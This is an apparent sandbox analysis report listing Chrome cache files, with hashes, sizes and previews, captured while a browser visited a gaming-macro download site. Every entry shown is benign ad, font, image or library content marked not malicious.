Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 727 x 380, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	11489
Entropy (8bit):	7.928741117538931
Encrypted:	false
SSDEEP:	192:KVKggNVkMIW1fprYVczzz5jknVAAi1fTbg1fV8shSsmdYI6TbmvkvxD:sMVkMJxfzf5InVniiThTcOxD
MD5:	4A3A02542BBD6D260AFD680F4EB9F0CE
SHA1:	C368D3DCA48E4821725DBA39220ABF4D388BB519
SHA-256:	55B64C16025EA72D28B1023DA02FBCD12A1ED0B97D60E39E6BFEF15B506758FD
SHA-512:	2FC2CE8CA52EC44E4B2B8151C6CA5F71732E9EBD02B6546D47F3F9F43D387DB3E4C2EAACCA6EE74551C21A01D172425E0D97D1A250B52C77C3492DD83A1BAAF6
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/simgad/5847665996604479684/14763004658117789537
Preview:	.PNG........IHDR.......\|.....3cg....uPLTE3.&..........x...V.K...}.t.......^.T.............v.m=.0..........E.9S.HI.=\.Qo.f.........i.`...........X...`zTXtRaw profile type APP1..X..[.$..E.{...=..rHQ2.0lc.........0....]......................._._..}.o.....,YEy3...K......yWx3...o_s$.t.......3z.y..9 ..q..mk.RL..X>R....._.JR.3.....O]..Zg.=.\{].U......^.\|&..&.]..H....^2.....e.0N..q....>..r....'...?.\|..{.s@T:......>.:f..<......:.. e._7...v....+..O.=.<.+Ys{.M..\|r^.y.<J)RJ>E8.p.\|.$..:....;...a,....wGyr.F.>((.c.R.1~s.............'V2......".;..1BE.,....\|..[....&B._5.JL..U.....&..rn._..J.g.....2...P...K^...5...g......3....>.......+9.1/fW.w..V.0..k....0f...O.3.W....vX.JX.J..>z?..6gP:..mV..6S.*.5goP...d...!.}..U..m.[...w....;....t..)..!> .q..~N....Pk.l.....%..5..c..GsmG....V+....{q......o..W.I.Vt,tEu...cio\...........6....V..L.^vY..K.4....N...d.S..~.0)X..D.v...W&-......?.GG[.....U..h.$?.......^.r.L6@u..u.j=s.}Fe....K..&..n^u.`...

Chrome Cache Entry: 383

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (829), with no line terminators
Category:	downloaded
Size (bytes):	829
Entropy (8bit):	5.403227044332781
Encrypted:	false
SSDEEP:	24:4HksUq5/Jz2pRNrBZJuvu8goqc0ioNhc+a4+mI:2fz2bNrVENtmN+y+j
MD5:	D2ED487ACCE579A7D55059BD7485CA8F
SHA1:	D730760FF8DD5147962C7953FE2CD84DF0428675
SHA-256:	66478CC4838BB9394D9352335C707F774C32B83092434A48F3C61DE4E4706623
SHA-512:	5D3944B84309E11A5877CBFEED02162C793991211C07280D65F546B49BFE5C1DA526F215FD4A52878ED2C095BA05C1FB2243883096142412A1CBAE5B0F4118FB
Malicious:	false
Reputation:	unknown
URL:	https://www.google.com/recaptcha/api2/aframe
Preview:	<!DOCTYPE HTML><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body><script nonce="yzlf5z9j8s6u6hdjt5SLEA">/** Anti-fraud and anti-abuse applications only. See google.com/recaptcha / try{var clients={'sodar':'https://pagead2.googlesyndication.com/pagead/sodar?'};window.addEventListener("message",function(a){try{if(a.source===window.parent){var b=JSON.parse(a.data);var c=clients[b['id']];if(c){var d=document.createElement('img');d.src=c+b['params']+'&rc='+(localStorage.getItem("rc::a")?sessionStorage.getItem("rc::b"):"");window.document.body.appendChild(d);sessionStorage.setItem("rc::e",parseInt(sessionStorage.getItem("rc::e")\|\|0)+1);localStorage.setItem("rc::h",'1730398782744');}}}catch(b){}});window.parent.postMessage("_grecaptcha_ready", "");}catch(b){}</script></body></html>

Chrome Cache Entry: 384

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1055)
Category:	dropped
Size (bytes):	2690
Entropy (8bit):	5.39866636776827
Encrypted:	false
SSDEEP:	48:Otg7xBqHIN7QaE9Fa9FZpPiNmgrZyHicju8m5I0zRHkFRCmTx:fN7Qabhiwdicju8WhRHMnTx
MD5:	76A4D84DE75340D59CA06503A14184D4
SHA1:	2FE3C4A95AF88BE57D1912BB09DC463F69924402
SHA-256:	66E9BF446316F6EEC5EAEFA7098592BBD2144A60EB38C481DB233A6CA8B8D94A
SHA-512:	2ABE6C816B265B72A8023E8F832B9BED0FFD2C931BA07C5DA1AE0CB5D60178CBD1CEA9CE6AE0BB88F77614954C20836342AD6BAFE25EB1CA4D2AEB495E4E2BD2
Malicious:	false
Reputation:	unknown
Preview:	(function(){'use strict';function f(a,b,e){a.addEventListener&&a.addEventListener(b,e,!1)};/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .function g(a,b,e){if(Array.isArray(b))for(var c=0;c<b.length;c++)g(a,String(b[c]),e);else b!=null&&e.push(a+(b===""?"":"="+encodeURIComponent(String(b))))};function l(a=document){return a.createElement("img")};function m(a,b,e=null,c=!1){n(a,b,e,c)}function n(a,b,e,c){a.google_image_requests\|\|(a.google_image_requests=[]);const d=l(a.document);if(e\|\|c){const k=h=>{e&&e(h);if(c){h=a.google_image_requests;const v=Array.prototype.indexOf.call(h,d,void 0);v>=0&&Array.prototype.splice.call(h,v,1)}d.removeEventListener&&d.removeEventListener("load",k,!1);d.removeEventListener&&d.removeEventListener("error",k,!1)};f(d,"load",k);f(d,"error",k)}d.src=b;a.google_image_requests.push(d)};function p(a=null){return a&&a.getAttribute("data-jc")==="22"?a:document.querySelector('[data-jc="22"]')};var q=document,r=window;functi

Chrome Cache Entry: 385

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	15390
Entropy (8bit):	7.981710859869424
Encrypted:	false
SSDEEP:	384:7ongf2TBlfgiAkVm6mSe0fGayL0u7Oan4tCZd+v1v5G3FPTT3wf9v3po:7obfjAkIlT0Fy/N4tg2xGVfoC
MD5:	EA76156E28E493E4BC53BAEB6067E19F
SHA1:	2F17563BC0554843E5E26E9C43484053AA0B288B
SHA-256:	03FC9A897498F42889AA376C0DA9962D4ED3CFE59E5F3C15F2DF7EC0BE5F812F
SHA-512:	405CEABB8784B66EE780F1A71E6818E59EDD732D886693D78CAD3F5BF462CC0CDE0CF12352F8E1574800080AA7E2903B474CC654862F578C57EB413E57710F93
Malicious:	false
Reputation:	unknown
URL:	https://a.fsdn.com/con/app/proj/tmacro/screenshots/tgmacro0.png/max/max/1
Preview:	RIFF.<..WEBPVP8L.<../E...5.#.m$I....J.+.....`v..$%ip..r.e............Bb..-.V_s.......E25.GlK..._..L..&..V.o.hq.x.......)..8.u..v..l.......[f....0/.........4efn...~.......)ef........O....U..Z..Eg.4.em\|.W.2..di.Ye....)..{r.S..fwR..6...}a.a...%..e..).8:.hwT9+...J.H..S....F.+..f...J...a....l...w..'.Y}.:..$m..:...N+...C%....q......[-W.#w...z...3.$m..6.U..M..ev<....+. .EO.UVe.F...+....W`.P......1.m.m.m.m.m.8Z.mU..}...x'M.m^./.eg.....].m...vw.......(..t..e.m.m{....L_......x...3..y&Bl.n:.k.7..g...l3Rl{..v.=X..m..q...'\F.mD..D....S....m....m.6.m.....Q...lc.$5..lgg.6.m...m..m{....i..;.$IQ..s.;.'..?.m.....q.....c@t..s.$....3.'.......l..._...{+..O.NYD..@.....L..^o.a(............'yf .f?...s..\|..9.Uf..'Co..ml[mtk........#U@}T@...by........8.%]...2...k...c......g...l.m.m.m..u..}_...Elc6v.}.;Yv..oq2...gc...c..:u...:.n.f..i..w3.V..8S.O.T.......g.Vm.u..lp.=y...\|..;]g....c[}.3....F."..........-@......N3r..$.f......Hc..........e...6.2c.:..v.8.

Chrome Cache Entry: 386

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2020)
Category:	downloaded
Size (bytes):	9321
Entropy (8bit):	5.488083545900101
Encrypted:	false
SSDEEP:	192:hAdU2WTFZOKRme5HNf4E/Q3uuNQ8Qd3yuM9lFEjr5zG:hAd9WTvOYB5R4E/QeuNVK3yu6lF6r4
MD5:	35F2DD7CDD8EA7BEF7DD50FCA553A4A9
SHA1:	35FAD9B309BE65A4200B417E608DE9068649D701
SHA-256:	9F0E4A972197AF0DF6B45A3499BDA7BC8004A8D049673AF7076C867136C2A515
SHA-512:	335D139CF2C0A3BAE76B977129C66AA54AAF8BD87B8229CD465D0F2868430AE4572F1AC913539F65057E805B90BF172D6938F01DE7D974EF007DFC8955C37575
Malicious:	false
Reputation:	unknown
URL:	https://www.gstatic.com/mysidia/35f2dd7cdd8ea7bef7dd50fca553a4a9.js?tag=engine/client_fast/client_fast_engine
Preview:	(function(){'use strict';/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var h=this\|\|self;function k(a,b){a=a.split(".");var c=h;a[0]in c\|\|typeof c.execScript=="undefined"\|\|c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length\|\|b===void 0?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b};function aa(a){h.setTimeout(()=>{throw a;},0)};var l,p;a:{for(var q=["CLOSURE_FLAGS"],r=h,u=0;u<q.length;u++)if(r=r[q[u]],r==null){p=null;break a}p=r}var v=p&&p[610401301];l=v!=null?v:!1;var y;const z=h.navigator;y=z?z.userAgentData\|\|null:null;function A(a){return l?y?y.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function B(a){var b;a:{if(b=h.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function C(){return l?!!y&&y.brands.length>0:!1}function D(){return C()?A("Chromium"):(B("Chrome")\|\|B("CriOS"))&&!(C()?0:B("Edge"))\|\|B("Silk")};!B("Android")\|\|D();D();B("Safari")&&(D()\|\|(C()?0:B("Coast"))\|\|(C()?0:B("Opera"))\|\|(C()?0:

Chrome Cache Entry: 387

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=whaleco_services_llc&google_push=AXcoOmRTXTUn1Pr6awWAnQRPgchY6LBTD7UWgfftnoBHloxfG5GmoNInKY9_iM4LiUT3GONf9BhydenY40DkAIQfixnY9Gu6A9hJZS1O
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 388

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (841), with CRLF line terminators
Category:	downloaded
Size (bytes):	12566
Entropy (8bit):	5.020674237139358
Encrypted:	false
SSDEEP:	192:0tovq07svqqKvaas5OyHoUxRtVKScSt0h3u3sRgk2fsMRQuJztH:0mvq07svqhROxRtVK/uVnj3ztH
MD5:	C15F8C9AE9F46DA539086B03F059EAF3
SHA1:	FCFB9F45613B41781E54C18F3EE5F36DA5A5EFF1
SHA-256:	D9CF3BE51344F26074A1AD21695D757E021DC734945028B76DEA2A0B77DBBCB6
SHA-512:	16D7CCB50CDDA5AE12F667C4B9D880933C67AE863B33577CA8588F89D8864A0F2A3B2CD35A7CA75DCB0AE2AB92C3A771D8E4F24CBDEA249113927AF7AED777D6
Malicious:	false
Reputation:	unknown
URL:	https://trksyln.net/Error
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="utf-8" />.. <meta content='text/html; charset=utf-8' http-equiv='Content-Type'>.. <meta http-equiv='X-UA-Compatible' content='IE=edge'>.. <meta name='viewport' content="width=device-width,height=device-height, initial-scale=1, shrink-to-fit=yes">.... theme colors -->..<meta name="theme-color" content="default" />..<meta name="apple-mobile-web-app-status-bar-style" content="default">..<meta name="apple-mobile-web-app-capable" content="yes">..<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">...... Basic meta info -->..<meta name="keywords" content="gaming macro software, macro recorder for gaming, keyboard and mouse macro for gaming, gaming automation software, tgm macro for pc gaming, rapid-fire macro software, gaming macros and shortcuts, macro tool for competitive gaming, tgm gaming macro for streamers, macro editor for gaming, tgmacro, tgm gaming macro, tgmacro download, tgm

Chrome Cache Entry: 389

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
Category:	downloaded
Size (bytes):	604
Entropy (8bit):	7.573620174038291
Encrypted:	false
SSDEEP:	12:6v/7dkfFQPHl09Kor6EHz1g+WVmObBbBbaLPIpTIiVojx5cF8NonhstcAzhu1:CkEl0nr6EHz1VWV33ePIpTzVojx5p6nH
MD5:	7BD42E5A35B5FB3FF852D6EA9191CA83
SHA1:	8A141EB392A05A2DEA3DCD83B97940EF70A81EBC
SHA-256:	5C4A713EE4250851232BE9F9F68D41586BE39B299528CFC7266E0B0E7E582E1B
SHA-512:	6FF31ACB937D6944570A837BB77AED92DAE41D71681440DC4765758FC40585F55999F2CDD78C4CE76A5AB414331BA9959BAFCFEF7E85B756AAB899C247F02890
Malicious:	false
Reputation:	unknown
URL:	https://www.gstatic.com/images/icons/material/system/2x/settings_grey600_24dp.png
Preview:	.PNG........IHDR...0...0.......1....#IDATx...MKTQ...3...K...gP.Eo.Z$..6......"0..."..E-Z...C....+..E.T...JH/.HC.$d...y..."..W...w.3..3..9... ^..Fr4R.Q.....H<...\...V.[...v.L.D...y.wYQ....]....w&...\|F...iz8..b.s.r..[.H..5..5D..[@.ed.-...O..=..G..lpD.R.F".J....... .. y..$>.)V.`..quuP4.W9.}......y......~E}.7....IU.~.!.Ak.>....A..o..._.....7.4...{.K..6o.O..5.0n.`..z...V."^. 0.x=..^M...*t...H..9.B.(UD..>heD......."....W..T.E..0D.fYfI..3.-.G".....#.p....q.......Bv..{5.!u.F.i.......[.s.)....I....v.....Y.P.5?...n.'.......;...T......f......Q...~...8.....h.......T3<........IEND.B`.

Chrome Cache Entry: 390

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 25900, version 1.0
Category:	downloaded
Size (bytes):	25900
Entropy (8bit):	7.991434457298154
Encrypted:	true
SSDEEP:	384:OLTqy78VCAYDZlFxnX78TiR2edW0GDVOCXU59Pt0jIKYf8cApL5s5AOw5+aAPc7:gvH5DZBnXgTiR2TDoV5eWUcuHoc7
MD5:	E8B4671738219A2B2E873F10815FB415
SHA1:	8BF71661E8FBC3ED29996367712C41FAE0F6CB23
SHA-256:	E166664C0772A64D48BE8ADE6B4D59CF11DBF7CEEA6BEDFF6321A0E0D822A9D9
SHA-512:	78EB38DA7B2007FEE9EAE5E144DF8682A238BAF50F41619A010BD38A9C9DF77A02A476E9E103098FFB9A03A7A5B76D33059764C246DF60CD9D4C48DF170EA4DB
Malicious:	false
Reputation:	unknown
URL:	https://fonts.gstatic.com/s/baloopaaji/v21/8AttGsyxM5KQQU-Y4MTwVanUqRo.woff2
Preview:	wOF2......e,.......`..d.............................h..R.`..t.....v........5..R..6.$.. . ..$.....?...'..n@.n.@A.;.>V.ts'r;Q.@........).....l.X...C.l...^..{P.df)D..j..!tYY..C.X.zT... ..h`....R.Tyl.'%7....<.1dw...$.h.c.C-..............Cr.R..../j.0.a..m%..O.S.i....W..cJj.K...)..+.$5w4t$t......} .v"..c.%..h`......J..j.vp..[.8.<..:..?....U.`...$MT.V.N/......6m.xd...}.:...p.t2D..`....1.&.V.,.4.[.`...b......:..4j..$...d..1..Y..4.o.....*..J.......?..c....=VA.6..ac.....%Z.....=...._....+....w..5U+...3....n7.P...c.?.Y.@.B.....A.._e..q..p...S,..O........4.....\.Z../G...7.wB(....g.C..;9.......z}.N.....Mq5.s.j...A.K.a...o..J.;W.mf.d../.6......d,.e.r.W...[,......\._.{rM.\|..4....=........c......;[...n..V\|..S;#..:vX.J...G~.......(szks..0?..=..q..@.B^.01.......P...j7@...).;.....)...iC..-.}.4...Y`......W}.......{.+.?..1DATN.....?.....,.:[1I.....T..s.{..%W...X..uzH.T..4x..@..O.R p.K....ZE[._. !...4S.9.Y+.s.H._.^.^.....G... ...6..@..I.eI..m.i4E.q.i...y.

Chrome Cache Entry: 391

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2016)
Category:	downloaded
Size (bytes):	39635
Entropy (8bit):	5.519642162172215
Encrypted:	false
SSDEEP:	768:qzYb3uSHMeNfX5m6cx/qbk/Bssq+2ZSgxIs9bWHGJ4CricXgTpg/4G0yl6qQHm5L:RDlO/qY/B82c8OACsvEF
MD5:	CC42289087B3F73300F3C5E415B64EC5
SHA1:	6601C16428E3F155F0F2A43A8BF8773A0E2F9C60
SHA-256:	9713067914ACF51B1A42776C63F42801C2145580D8923848BDE24581C9157DC0
SHA-512:	A2FD8E9024A0DCB41FC31C7F2B1CCE7ED7E320EA585F39DF963758B904A6472600C0BE12B814AD879E202632329DB49B391B61B4466A1E49A1E6415387F5C520
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/client/one_click_handler_one_afma_fy2021.js
Preview:	(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this\|\|self;function aa(a,b){a:{var c=["CLOSURE_FLAGS"];for(var d=m,e=0;e<c.length;e++)if(d=d[c[e]],d==null){c=null;break a}c=d}a=c&&c[a];return a!=null?a:b};const ba=(new Date("2024-01-01T00:00:00Z")).getTime(); .function ca(a){a=a.s;const b=encodeURIComponent;let c="";a.platform&&(c+="&uap="+b(a.platform));a.platformVersion&&(c+="&uapv="+b(a.platformVersion));a.uaFullVersion&&(c+="&uafv="+b(a.uaFullVersion));a.architecture&&(c+="&uaa="+b(a.architecture));a.model&&(c+="&uam="+b(a.model));a.bitness&&(c+="&uab="+b(a.bitness));a.fullVersionList&&(c+="&uafvl="+b(a.fullVersionList.map(d=>b(d.brand)+";"+b(d.version)).join("\|")));typeof a.wow64!=="undefined"&&(c+="&uaw="+Number(a.wow64));return c} .function da(a,b){return a.g?a.m.slice(0,a.g.index)+b+a.m.slice(a.g.index):a.m+b}function ea(a,b=0){let c="&act=1";b===0?c+="&ri=1":b===1?c+="&ri=24":b===2&&(c+="&ri=25");a.l&&a.s&

Chrome Cache Entry: 392

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2415)
Category:	downloaded
Size (bytes):	2754
Entropy (8bit):	5.193623900439384
Encrypted:	false
SSDEEP:	48:fwNdf9pTzTPvwsR2r2U4b3Ybk5JwYsH2/zlq9/S2sQBiETswEqHBnAFswkcK0MUG:f4df9hTHwsR2jk5sH2/2VzTmq6kRMkL
MD5:	1CBBCCA1D53705256FE48B2DE6354B29
SHA1:	3B0B68688A39F7109FA0A709A8B74EE690A97F4D
SHA-256:	935B0999723A39EBAA3777EBCE2ED743881FD3776AA10393CE760AB0DBEACDF1
SHA-512:	1A00FCC414F9C4EE9D046FB2A8F64B5219D06237B538F92972B8187F00A8942837B5EB734268855EAE1D4459FB19D9A5992D96064397C50B8DDC4EADCD376ED8
Malicious:	false
Reputation:	unknown
URL:	https://cdn.jsdelivr.net/npm/bootstrap-affix@1.0.1/assets/js/affix.min.js
Preview:	/*. Minified by jsDelivr using Terser v5.19.2.. * Original file: /npm/bootstrap-affix@1.0.1/assets/js/affix.js. . Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files. */.!function(t){"use strict";var i=function(e,o){this.options=t.extend({},i.DEFAULTS,o),this.$target=t(this.options.target).on("scroll.bs.affix.data-api",t.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",t.proxy(this.checkPositionWithEventLoop,this)),this.$element=t(e),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};function e(e){return this.each((function(){var o=t(this),f=o.data("bs.affix"),n="object"==typeof e&&e;f\|\|o.data("bs.affix",f=new i(this,n)),"string"==typeof e&&f[e]()}))}i.VERSION="3.3.7",i.RESET="affix affix-top affix-bottom",i.DEFAULTS={offset:0,target:window},i.prototype.getState=function(t,i,e,o){var f=this.$target.scrollTop(),n=this.$element.offset(),s=this.$target.height();if(null!=e&&"t

Chrome Cache Entry: 393

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 394

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 627, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3875
Entropy (8bit):	7.21080746216504
Encrypted:	false
SSDEEP:	96:oMFiuNE7qj8MThYnWHK8HF3LLDNrFPX05c39:7NNgATXK2dPNrFPH
MD5:	BD1466C2FFB9640B0C062AEE954C83B2
SHA1:	E27657B673A90092D21E1F2AB7519FB78176A9EC
SHA-256:	3F1BCC40B33449E15AE643DA68AD4DF9E525197DBEF09CBC612661B64C4A583D
SHA-512:	8C4016579573B081773D2F58BF5AB905187AC78BE20E1DCBE48A17D03084E9E2E878BF8061409D3DA388BCE7B97189D2C4E39FC712DB5F0614FDCD18919A6CB5
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......s.....(S.....~PLTE.o....<........)w.v...z.o.............._....."r.d.....%t....~..W.....4~......................B..M..O..r.....>.......................`IDATx....Z.J..P..Q.E.QDm......b.2.D......_..kW..............................................................................................................................................................................................................................................................................................................................s...[....dvq:.^6..jc:../.....}W....q5j.\|.......;m....Y{.....lp0.L.....w.'.Wo....#..\|.V..U..b..m...kWI..w.1..ut.Q\.,.......O...O.9.]-....l...Z=...{....S......u.w..U.Y......-.W......{<]_...u.k.&._..~.E..JI...U?;.....X..J.Uu....,`wjE....r,...N..a...N`.;3.,.j...0.yF`.;..ux................)......0....,x..z.~..8e@....q$......h..p....U.W.....F..s...+.......y0y....K...#..:......u.....V.Xy..N...I.U.3.Z......X.?.5...8...[r.G....u..f.

Chrome Cache Entry: 395

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1382)
Category:	downloaded
Size (bytes):	17945
Entropy (8bit):	5.330388445341784
Encrypted:	false
SSDEEP:	384:AbnElW+CdYyqBFy9G/JtCHAOgRImVWsc5JZB:Ll3CdnqC9ct2A1ImVWsc5h
MD5:	3B071D5606CC1CF92AE307F5BDB4E540
SHA1:	E191068CC90E5489130489A1CF173FE50BBA28B8
SHA-256:	FF3DE130872FE0FB5B770DFA2BC9F0DAF8AB320403A34A60D089436F08D24F99
SHA-512:	8A1287D7528B2B65D61D6E0A639F2CBE5658AFC3EDB5E2AF9494E8CC876AA6C8060A55D3BD4AA85A0B3B82733E64F7F7A6B4A5F2597FD99FD37136A83A6BBCAD
Malicious:	false
Reputation:	unknown
URL:	https://ep2.adtrafficquality.google/sodar/sodar2.js
Preview:	(function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var n=ba(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},u={};function w(a,b,c){if(!c\|\|a!=null){c=u[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,writable:!0,value:b}):b!==c&&(u[d]

Chrome Cache Entry: 396

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (12736)
Category:	downloaded
Size (bytes):	13165
Entropy (8bit):	5.22818331346204
Encrypted:	false
SSDEEP:	192:LO3pHufbPUCpEcrbCpg68vhtz91LO7sgBy70nZbPkks3ZXF1vh3rg1Q5l8hY6o3+:LdACfCghtzb0tnByHVh3s1Q5l8hY+
MD5:	019CC2AB665A19CB1049E5454E783E72
SHA1:	94B2233167E4F041C31CBBCDE3DE94DAA4128E47
SHA-256:	0154DD42BD93330B04AD745C5A8AE3EDF98C343DC1FE40D41C272DF3F5D59DC5
SHA-512:	722973362B3C0FDD96405401278BD803E86D75C8D610491A94309D84F83AAFC5DDA796CBB8806AB27671EEA20C147124C0E1ADA630B429ED2BD149EEEDE7ECD0
Malicious:	false
Reputation:	unknown
URL:	https://kit.fontawesome.com/8ce76d2187.js
Preview:	window.FontAwesomeKitConfig = {"id":51480605,"version":"6.6.0","token":"8ce76d2187","method":"css","baseUrl":"https://ka-f.fontawesome.com","license":"free","asyncLoading":{"enabled":false},"autoA11y":{"enabled":true},"baseUrlKit":"https://kit.fontawesome.com","detectConflictsUntil":null,"iconUploads":{},"minify":{"enabled":true},"v4FontFaceShim":{"enabled":true},"v4shim":{"enabled":true},"v5FontFaceShim":{"enabled":true}};.!function(t){"function"==typeof define&&define.amd?define("kit-loader",t):t()}((function(){"use strict";function t(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(t);e&&(r=r.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),n.push.apply(n,r)}return n}function e(e){for(var n=1;n<arguments.length;n++){var o=null!=arguments[n]?arguments[n]:{};n%2?t(Object(o),!0).forEach((function(t){r(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):t(O

Chrome Cache Entry: 397

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	17073
Entropy (8bit):	6.01600178254449
Encrypted:	false
SSDEEP:	192:00oGWcc5CnEOrw5IytijuAqfOFk25KBkdOojG6B2/JYAum/DkChjJFk9RR470Gc8:007ICEAwuLBq3yKKKXuck8HCf470o5X
MD5:	70527DDA47D08745BB078844B9D69C91
SHA1:	A13B3F1BCA985B1431B5B502BB1E433C27507EE3
SHA-256:	3F39549AAF4922FF98C6B9F1A763CAD223A3B7748E71DD7CBBDA1D35BC6DA6C9
SHA-512:	40B625FF9DE13CA981B676CA4EB0FDE85C799DFBE6671FBA877B88E7384DDE09519CBD76ECC8AD33072E1D482E4E0AD6E23C3726BFCEB8ABA29077FAE5BE9134
Malicious:	false
Reputation:	unknown
